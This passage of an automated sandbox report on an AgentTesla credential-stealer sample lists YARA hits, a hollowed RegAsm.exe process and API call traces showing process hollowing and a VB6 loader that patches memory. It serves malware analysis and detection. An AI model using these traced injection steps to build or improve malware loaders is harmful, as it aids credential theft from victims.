JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:17:50
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase:	0x970000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4156794778.0000000002E82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4156794778.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21.4%
Dynamic/Decrypted Code Coverage:	9.3%
Signature Coverage:	6.2%
Total number of Nodes:	550
Total number of Limit Nodes:	68

Executed Functions

Function 022A2DA5 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 369
nativethreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 022A2F91
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 022A2FBE
CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 022A3169
NtGetContextThread.NTDLL(?,?), ref: 022A3188
NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 022A31AE
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 022A31D8
NtUnmapViewOfSection.NTDLL(?,?), ref: 022A31F3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 022A320C
NtSetContextThread.NTDLL(?,00010003), ref: 022A323D
NtResumeThread.NTDLL(?,00000000), ref: 022A324A

Strings

m.ex, xrefs: 022A30CC
\Microsoft.NET\Framework\, xrefs: 022A30DA
e, xrefs: 022A30D3
D, xrefs: 022A3144
egas, xrefs: 022A30C5

Memory Dump Source

Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd

Similarity

API ID: Section$ThreadView$ContextCreateMemoryVirtual$ProcessReadResumeUnmapWrite
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 1951729442-1087957892
Opcode ID: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
Instruction ID: 1f07927fcd9acedf42666c483b64391fea9c6ec642e7b596e81d01e92bb132b7
Opcode Fuzzy Hash: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
Instruction Fuzzy Hash: 41E1F3B2D1429AAFDF11DFE4CC90AADBBB9EF08304F1480AAE515AA604D7749E41CF54

Function 022A2D84 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 361
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 022A2F91
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 022A2FBE

Strings

m.ex, xrefs: 022A30CC
\Microsoft.NET\Framework\, xrefs: 022A30DA
e, xrefs: 022A30D3
D, xrefs: 022A3144
egas, xrefs: 022A30C5

Memory Dump Source

Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd

Similarity

API ID: Section$CreateView
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 1585966358-1087957892
Opcode ID: 6327e63b1e9fef26b9da0fe59f744d1e2ca5589a6206d007fbefc548ff69a82f
Instruction ID: 89774a5bc8df415278a573dfb9bf125f885b984ca95de5ea2791d1be429ea90c
Opcode Fuzzy Hash: 6327e63b1e9fef26b9da0fe59f744d1e2ca5589a6206d007fbefc548ff69a82f
Instruction Fuzzy Hash: 68E1F5B2D1425AAFDF21DFE4CC91AADBBB9FF08304F1440AAE514AA604D7749E41CF54

Function 0054AA9F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,NtQueryInformationProcess,00549803,?,NtQueryInformationProcess,0054981D,?,NtQueryInformationProcess,005497EC,NtQueryInformationProcess), ref: 0054AB36
NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,00000040,?,?,NtQueryInformationProcess,00549803,?,NtQueryInformationProcess,0054981D,?,NtQueryInformationProcess,005497EC,NtQueryInformationProcess,0054988E), ref: 0054AB61
NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,?,?,?,NtQueryInformationProcess,00549803,?,NtQueryInformationProcess,0054981D,?,NtQueryInformationProcess,005497EC,NtQueryInformationProcess,0054988E), ref: 0054AC5D

Strings

NtQueryInformationProcess, xrefs: 0054AAC1, 0054AAD6, 0054AAEE, 0054AB06

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: MemoryVirtual$Protect$Allocate
String ID: NtQueryInformationProcess
API String ID: 955180148-2781105232
Opcode ID: 65003259267a48dea0162c14ed572c17b15970b34e6d359670fe1a0235e867d8
Instruction ID: a3cbb4029fee8000afd623c5b8054db80d084ecb38c8d31c404502b2b63c41a0
Opcode Fuzzy Hash: 65003259267a48dea0162c14ed572c17b15970b34e6d359670fe1a0235e867d8
Instruction Fuzzy Hash: 2251C57194460AAFDB40DFA8CC89FEEFFB5FB94318F148209E111A7191D7B09A448B62

Function 0054B868 Relevance: 194.9, APIs: 108, Strings: 3, Instructions: 691
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054B2C3,?,?,?,?,?,00401526), ref: 0054B885
__vbaStrCat.MSVBVM60(0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8A1
__vbaStrMove.MSVBVM60(0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8AB
__vbaStrCat.MSVBVM60(bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8B6
__vbaStrMove.MSVBVM60(bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8C0
__vbaStrCat.MSVBVM60(0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8CB
__vbaStrMove.MSVBVM60(0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8D5
#644.MSVBVM60(00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3), ref: 0054B8DB
GetModuleHandleW.KERNEL32(00000000,00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526), ref: 0054B8E1
__vbaFreeStrList.MSVBVM60(00000003,?,00401526,00000000,00000000,00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000), ref: 0054B8F9
__vbaChkstk.MSVBVM60 ref: 0054B918

Part of subcall function 0054F663: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054F67F
Part of subcall function 0054F663: __vbaVarDup.MSVBVM60(?,00000008,?,?,00401526), ref: 0054F697
Part of subcall function 0054F663: #653.MSVBVM60(?,?,?,00000008,?,?,00401526), ref: 0054F6A4
Part of subcall function 0054F663: __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401526), ref: 0054F6AD
Part of subcall function 0054F663: __vbaFreeVar.MSVBVM60 ref: 0054F6C6
Part of subcall function 0054F663: #632.MSVBVM60(?,?,00000001,00000002), ref: 0054F6FB
Part of subcall function 0054F663: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F70C
Part of subcall function 0054F663: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F716
Part of subcall function 0054F663: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054F725
Part of subcall function 0054F663: __vbaFreeVar.MSVBVM60(0054F768), ref: 0054F762

__vbaStrVarVal.MSVBVM60(?,?,?), ref: 0054B93A
__vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 0054B944
GetProcAddress.KERNEL32(00000000,?), ref: 0054B950
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 0054B964
__vbaFreeVar.MSVBVM60 ref: 0054B96F
__vbaStrCat.MSVBVM60(0040A728,0040A71C), ref: 0054B97E
__vbaStrMove.MSVBVM60(0040A728,0040A71C), ref: 0054B988
__vbaStrCat.MSVBVM60(0040A738,00000000,0040A728,0040A71C), ref: 0054B993
__vbaStrMove.MSVBVM60(0040A738,00000000,0040A728,0040A71C), ref: 0054B99D
__vbaStrCat.MSVBVM60(0040A74C,00000000,0040A738,00000000,0040A728,0040A71C), ref: 0054B9A8
__vbaChkstk.MSVBVM60 ref: 0054B9BA
__vbaStrVarVal.MSVBVM60(00000000,?,?), ref: 0054B9DF
#644.MSVBVM60(00000000,00000000,?,?), ref: 0054B9E5
GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,?), ref: 0054B9EB
__vbaFreeStrList.MSVBVM60(00000003,00000000,0040A738,00000000,00000000,00000000,00000000,?,?), ref: 0054BA03
__vbaFreeVarList.MSVBVM60(00000002,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA18
__vbaStrCat.MSVBVM60(0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA2A
__vbaStrMove.MSVBVM60(0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA34
__vbaStrCat.MSVBVM60(0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA3F
__vbaStrMove.MSVBVM60(0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA49
__vbaStrCat.MSVBVM60(0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA54
__vbaStrMove.MSVBVM60(0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA5E
__vbaStrCat.MSVBVM60(0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA69
__vbaStrMove.MSVBVM60(0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728,0040A71C), ref: 0054BA73
__vbaStrCat.MSVBVM60(0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728), ref: 0054BA7E
__vbaStrMove.MSVBVM60(0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738,00000000,0040A728), ref: 0054BA88
__vbaStrCat.MSVBVM60(0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738), ref: 0054BA93
__vbaStrMove.MSVBVM60(0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758,?,?,?,0040A738), ref: 0054BA9D
__vbaStrCat.MSVBVM60(0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758), ref: 0054BAA8
__vbaStrMove.MSVBVM60(0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758), ref: 0054BAB2
__vbaStrCat.MSVBVM60(0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758), ref: 0054BABD
__vbaStrMove.MSVBVM60(0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000,0040A760,0040A758), ref: 0054BAC7
__vbaStrCat.MSVBVM60(0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000), ref: 0054BAD2
__vbaStrMove.MSVBVM60(0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000,0040A768,00000000), ref: 0054BADC
__vbaStrCat.MSVBVM60(0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000), ref: 0054BAE7
__vbaStrMove.MSVBVM60(0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000,0040A770,00000000), ref: 0054BAF1
__vbaStrCat.MSVBVM60(0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000), ref: 0054BAFC
__vbaStrMove.MSVBVM60(0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000), ref: 0054BB06
__vbaStrCat.MSVBVM60(0040A7A8,00000000,0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000), ref: 0054BB11
__vbaStrMove.MSVBVM60(0040A7A8,00000000,0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000), ref: 0054BB1B
__vbaStrCat.MSVBVM60(0040A770,00000000,0040A7A8,00000000,0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000), ref: 0054BB26
__vbaStrMove.MSVBVM60(0040A770,00000000,0040A7A8,00000000,0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000,0040A788,00000000), ref: 0054BB30
__vbaStrToAnsi.MSVBVM60(00000000,00000000,0040A770,00000000,0040A7A8,00000000,0040A7A0,00000000,0040A770,00000000,0040A798,00000000,0040A768,00000000,0040A790,00000000), ref: 0054BB3A
GetProcAddress.KERNEL32(00000000,00000000), ref: 0054BB46
__vbaFreeStrList.MSVBVM60(0000000E,00000000,0040A738,?,?,?,0040A758,0040A760,00000000,0040A768,00000000,0040A770,00000000,0040A778,00000000,00000000), ref: 0054BB8A
__vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000,0040A778,00000000), ref: 0054BBA5
__vbaNew.MSVBVM60(0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000,0040A788,00000000,0040A780,00000000), ref: 0054BBB7
__vbaObjSet.MSVBVM60(0040A780,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000,0040A788,00000000), ref: 0054BBC1
__vbaCastObj.MSVBVM60(00000000,0040A780,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000,0040A788), ref: 0054BBC7
__vbaObjSet.MSVBVM60(00000000,00000000,00000000,0040A780,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790), ref: 0054BBD1
__vbaObjSetAddref.MSVBVM60(00000000,00000000,00000000,00000000,0040A780,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000), ref: 0054BBDD
__vbaFreeObjList.MSVBVM60(00000002,0040A780,00000000,00000000,00000000,00000000,00000000,0040A780,00000000,0040A7CC,0040A7DC), ref: 0054BBEC
__vbaObjSetAddref.MSVBVM60(0040A780,005C92D0,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000,0040A788), ref: 0054BBFF
#644.MSVBVM60(00000000,0040A780,005C92D0,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000), ref: 0054BC05
__vbaFreeObj.MSVBVM60(00000000,0040A780,005C92D0,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790,00000000), ref: 0054BC10
#644.MSVBVM60(0040A71C,00000000,0040A780,005C92D0,00000000,0040A7CC,0040A7DC,?,?,?,?,?,?,?,00000000,0040A790), ref: 0054BC19
__vbaAryLock.MSVBVM60(0040A728,?,?,0040A71C,00000000), ref: 0054BC69
#644.MSVBVM60(0000000C,0040A728,?,?,0040A71C,00000000), ref: 0054BC81
__vbaAryUnlock.MSVBVM60(0040A728,0000000C,0040A728,?,?,0040A71C,00000000), ref: 0054BC90
__vbaObjSetAddref.MSVBVM60(0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BCB7
#644.MSVBVM60(00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BCBD
__vbaFreeObj.MSVBVM60(00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BCC8
#644.MSVBVM60(005C92CC,00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BCD6
__vbaAryLock.MSVBVM60(0040A728,?,00000000,0040A71C,00000004,005C92CC,00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BCF8
#644.MSVBVM60(0000000C,0040A728,?,00000000,0040A71C,00000004,005C92CC,00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BD0F
__vbaAryUnlock.MSVBVM60(0040A728,0000000C,0040A728,?,00000000,0040A71C,00000004,005C92CC,00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BD1E
#644.MSVBVM60(005C92D0,0040A728,0000000C,0040A728,?,00000000,0040A71C,00000004,005C92CC,00000000,0040A780,005C92D0,?,0040A71C,00000000), ref: 0054BD36
__vbaRedim.MSVBVM60(00000080,00000004,005C9214,00000003,00000001,00000010,00000000,0040A780,0040A71C,005C92D0,0040A728,0000000C,0040A728,?,00000000,0040A71C), ref: 0054BD7B
#644.MSVBVM60(?,?,0040A71C,00000000), ref: 0054BD87
#644.MSVBVM60(00000040,-0000000C,00000000,?,?,0040A71C,00000000), ref: 0054BDB0
__vbaAryLock.MSVBVM60(0040A728,005C92D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A71C,00000000), ref: 0054BDE4
__vbaStrCat.MSVBVM60(0040A804,0040A7FC,0000000C,00000000,0040A728,005C92D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A71C,00000000), ref: 0054BE0C
__vbaStrMove.MSVBVM60(0040A804,0040A7FC,0000000C,00000000,0040A728,005C92D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A71C,00000000), ref: 0054BE16
__vbaI4Str.MSVBVM60(00000000,0040A804,0040A7FC,0000000C,00000000,0040A728,005C92D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A71C,00000000), ref: 0054BE1C
VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040A804,0040A7FC,0000000C,00000000,0040A728,005C92D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A71C), ref: 0054BE34
__vbaHresultCheckObj.MSVBVM60(00000000,005C92D0,0040A7DC,0000002C), ref: 0054BE5C
__vbaAryUnlock.MSVBVM60(0040A728), ref: 0054BE74
__vbaFreeStr.MSVBVM60(0040A728), ref: 0054BE7C
#644.MSVBVM60(?,0040A728), ref: 0054BE85
__vbaAryLock.MSVBVM60(0040A728,00000000,00000000,-0000000C,?,0040A728), ref: 0054BEEF
#644.MSVBVM60(0000000C,0040A728,00000000,00000000,-0000000C,?,0040A728), ref: 0054BF07
__vbaAryUnlock.MSVBVM60(0040A728,0000000C,0040A728,00000000,00000000,-0000000C,?,0040A728), ref: 0054BF16
#644.MSVBVM60(0424448B,00000000,00000000,-0000000C,?,0040A728), ref: 0054BF44
#644.MSVBVM60(408B008B,005C92D0,0040A718,0424448B,00000000,00000000,-0000000C,?,0040A728), ref: 0054BF72
#644.MSVBVM60(20C4832C,005C92D0,0040A714,408B008B,005C92D0,0040A718,0424448B,00000000,00000000,-0000000C,?,0040A728), ref: 0054BFA0
#644.MSVBVM60(E02474FF,005C92D0,0040A710,20C4832C,005C92D0,0040A714,408B008B,005C92D0,0040A718,0424448B,00000000,00000000,-0000000C,?,0040A728), ref: 0054BFCE
#644.MSVBVM60(0000E0FF,005C92D0,0040A70C,E02474FF,005C92D0,0040A710,20C4832C,005C92D0,0040A714,408B008B,005C92D0,0040A718,0424448B,00000000,00000000,-0000000C), ref: 0054BFFC
VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000040,00000000,005C92D0,0040A708,0000E0FF,005C92D0,0040A70C,E02474FF), ref: 0054C068
__vbaHresultCheckObj.MSVBVM60(00000000,005C92D0,0040A7DC,00000020), ref: 0054C090
__vbaAryLock.MSVBVM60(0040A728,00000000), ref: 0054C0EB
#644.MSVBVM60(0000000C,0040A728,00000000), ref: 0054C103
__vbaAryUnlock.MSVBVM60(0040A728,0000000C,0040A728,00000000), ref: 0054C112
#644.MSVBVM60(005C92CC,00000000), ref: 0054C138
#644.MSVBVM60(0000E0FF,0040A71C,005C92CC,00000000), ref: 0054C157
#644.MSVBVM60(00000000,00000000,0000E0FF,0040A71C,005C92CC,00000000), ref: 0054C177
__vbaFreeVar.MSVBVM60(00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A71C,005C92CC,00000000), ref: 0054C197
__vbaAryDestruct.MSVBVM60(00000000,?,0054C222,00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A71C,005C92CC,00000000), ref: 0054C21C

Strings

@, xrefs: 0054BD9F
DqlqlqFquqnqcqtqiqoqnqCqaqlqlq, xrefs: 0054B901
bvm, xrefs: 0054B8B1

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$#644$Move$Free$List$LockUnlock$Chkstk$Addref$AddressAnsiCheckHandleHresultModuleProcProtectRedimVirtual$#632#653CastDestruct
String ID: @$DqlqlqFquqnqcqtqiqoqnqCqaqlqlq$bvm
API String ID: 4157516495-683613472
Opcode ID: 6f74a6ac4e4874fd9fba4c8bae260d56d608135e4d8541de1c61dc6ea2593dd3
Instruction ID: e1eb3e7dbfe43c06f703cb93ee5700968631c055528dc72762265e7630ec5018
Opcode Fuzzy Hash: 6f74a6ac4e4874fd9fba4c8bae260d56d608135e4d8541de1c61dc6ea2593dd3
Instruction Fuzzy Hash: 19421CB1D00208AFDB01EBA5CC86FEE77B9FF44308F10446AF505B71A2DA799A448F65

Function 0054D027 Relevance: 155.5, APIs: 103, Instructions: 974
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054D044
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401526), ref: 0054D05D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054D09A
__vbaObjSetAddref.MSVBVM60(?,?), ref: 0054D0C8

Part of subcall function 0054EEC1: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054EEDD
Part of subcall function 0054EEC1: __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401526), ref: 0054EEF6
Part of subcall function 0054EEC1: __vbaVarMove.MSVBVM60 ref: 0054EF15
Part of subcall function 0054EEC1: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054EF47
Part of subcall function 0054EEC1: __vbaVarCmpGt.MSVBVM60(?,005C92C0,00008003,0000000B), ref: 0054EF93
Part of subcall function 0054EEC1: __vbaVarOr.MSVBVM60(?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EF9D
Part of subcall function 0054EEC1: __vbaBoolVarNull.MSVBVM60(00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFA3
Part of subcall function 0054EEC1: __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFAF
Part of subcall function 0054EEC1: __vbaFreeObj.MSVBVM60(0054F0AB,?,00006011,?), ref: 0054F0A5

__vbaStrVarMove.MSVBVM60(?,?,00000000,?,?), ref: 0054D0DB
__vbaStrMove.MSVBVM60(?,?,00000000,?,?), ref: 0054D0E5
__vbaStrCopy.MSVBVM60(?,?,00000000,?,?), ref: 0054D0F5
__vbaFreeStr.MSVBVM60(?,?,00000000,?,?), ref: 0054D0FD
__vbaFreeObj.MSVBVM60(?,?,00000000,?,?), ref: 0054D105
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?), ref: 0054D10D
__vbaObjSetAddref.MSVBVM60(?,?,?,?,00000000,?,?), ref: 0054D119

Part of subcall function 0054EEC1: __vbaRedim.MSVBVM60(00000080,00000001,005C9220,00000011,00000001,-00000001,00000000,00000000,?,00000000,?,005C92C0,00008003,0000000B), ref: 0054EFD8
Part of subcall function 0054EEC1: __vbaAryLock.MSVBVM60(?), ref: 0054EFEA
Part of subcall function 0054EEC1: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054F02A
Part of subcall function 0054EEC1: __vbaAryUnlock.MSVBVM60(?), ref: 0054F042
